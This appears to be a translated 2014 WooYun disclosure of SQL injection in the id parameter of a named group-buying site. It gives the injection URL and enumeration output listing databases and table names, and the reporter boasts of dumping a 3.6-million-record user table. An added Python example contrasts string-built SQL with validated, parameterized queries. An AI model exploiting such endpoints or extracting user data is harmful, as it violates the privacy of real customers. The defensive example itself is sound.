WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2014-05-16: Details reported to the vendor, awaiting vendor handling
2014-05-16: Vendor confirmed; details disclosed to the vendor only
2014-05-26: Details disclosed to core white hats and relevant domain experts
2014-06-05: Details disclosed to regular white hats
2014-06-15: Details disclosed to intern white hats
2014-06-30: Details disclosed to the public
Affected site:
http://tuan.aili.com/
Injection link:
http://tuan.aili.com/ajax/system.php?id=17871&title=%5B%E4%B8%9C%E7%9B%B4%E9%97%A8%5D+%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E4%BB%85%E5%94%AE29%E5%85%83%2C%E4%BB%B7%E5%80%BC300%E5%85%83%E5%87%BB%E5%89%91%E4%BD%93%E9%AA%8C%E8%AF%BE1%E8%8A%82!%E5%9B%BD%E5%AE%B6%E7%BA%A7%E8%BF%90%E5%8A%A8%E5%91%98%E4%B8%93%E4%B8%9A%E6%8E%88%E8%AF%BE%2C%E4%B8%BA%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%B8%80%E6%A0%B7%E7%9A%84%E6%84%9F%E5%8F%97!%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E6%AC%A2%E8%BF%8E%E6%82%A8%E7%9A%84%E5%88%B0%E6%9D%A5!&team_id=57826&action=showbaidumap
The id parameter is used without any filtering, so it can be turned into SQL injection.
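To show why an unfiltered id parameter is dangerous and what the fix looks like, here is an added example (not the site's own code; the "system" table layout and its rows are constructed stand-ins, and the real PHP backend is not known): the first lookup splices the parameter into the SQL text the way the report describes, the second validates the value's shape and binds it as a parameter.

```python
import re
import sqlite3

# Constructed stand-in for the lookup behind ajax/system.php?id=...
# (assumption: the real table and column names are unknown).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE system (id INTEGER PRIMARY KEY, title TEXT, team_id INTEGER)")
    conn.executemany("INSERT INTO system VALUES (?, ?, ?)",
                     [(17871, "Dongzhimen fencing club", 57826),
                      (17872, "Second deal", 57827),
                      (17873, "Third deal", 57828)])
    return conn

def lookup_unsafe(conn, raw_id):
    # The vulnerable pattern: the request parameter becomes part of the SQL
    # text, so anything the client puts in it is executed as SQL.
    sql = "SELECT id, title FROM system WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def parse_id(raw_id):
    # Whitelist the shape of the value before it reaches the database layer:
    # a deal id is a positive decimal integer and nothing else.
    if not re.fullmatch(r"[1-9][0-9]*", raw_id):
        raise ValueError("id must be a positive integer")
    return int(raw_id)

def lookup_safe(conn, raw_id):
    # Validate, then bind: the value travels as data, never as SQL text.
    row_id = parse_id(raw_id)
    return conn.execute("SELECT id, title FROM system WHERE id = ?", (row_id,)).fetchall()

def demo():
    # Compare both lookups on a normal id and on a tampered one.
    conn = make_db()
    normal = "17871"
    tampered = "17871 OR 1=1"          # constructed tampered input
    return {
        "unsafe_normal": len(lookup_unsafe(conn, normal)),      # 1 row
        "unsafe_tampered": len(lookup_unsafe(conn, tampered)),  # whole table (3 rows)
        "safe_normal": len(lookup_safe(conn, normal)),          # 1 row
    }

if __name__ == "__main__":
    print(demo())
```

The tampered value is rejected by parse_id() before any query runs, which is the behaviour a fix for this report should have; an application-level check that id values are numeric is also an easy thing to alert on in web logs.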
Databases:
available databases [3]:
[*] information_schema
[*] test
[*] tuan
Current database: tuan. Tables:
Database: tuan [108 tables]
order, user, accoutlog, address, advert, area_team, ask, biz_team, branch, brand_list,
brands, business, card, cart, category, cenwor_tttuangou_regions, chosen, city, citylist, code,
collect, coupon, cps360_order, cps_baidu, cps_baidu1130, cps_duba, cpsorder, credit,
ctrip_group_coupon, ctrip_group_detail, ctrip_group_detail_bk, ctrip_group_info, ctrip_group_info_bk,
ctrip_group_order, daysign, daysign1, del_order, ecs_region, express_cdp, feedback, flow, friendlink,
fx_team, goods, groupon, groupon_coupon, groupon_order_list, hz_team, invite, logger_admin, lookoocps,
lottery_list, mailer, manager_action, managers, navigation, news, order_comments, outsite_voucher, page,
partner, partner116, partner_gallery, pass, pay, paycard, picture, prize_ticket, prize_ticket_win,
promotions, rebates_list, recharge_list, recomend_list, record_money, referer, refund_list, reg_message,
salesman, searchkey, send_paycard_code, send_paycard_team, setcode, siyu_team, smssubscribe, subcate,
subscribe, system, t_basic, team, team_detail, team_playshall, team_recycle, team_recycle0106, toolsbind,
topic, tuan800cps, vote_feedback, vote_feedback_input, vote_feedback_question, vote_options, vote_question,
voucher, voucher_refund, voucherbk, yiqifa_order, ymh_team, zhaoshang, zsfeedback
I dumped the user table at random: 3.6 million records, nothing more to say. Fix it quickly. I heard Aili gives out gifts~~~ hehe
Gifts~~~
Severity: High
Vulnerability Rank: 18
Confirmed at: 2014-05-16 18:31
Looks like we got dumped clean again this time.
None yet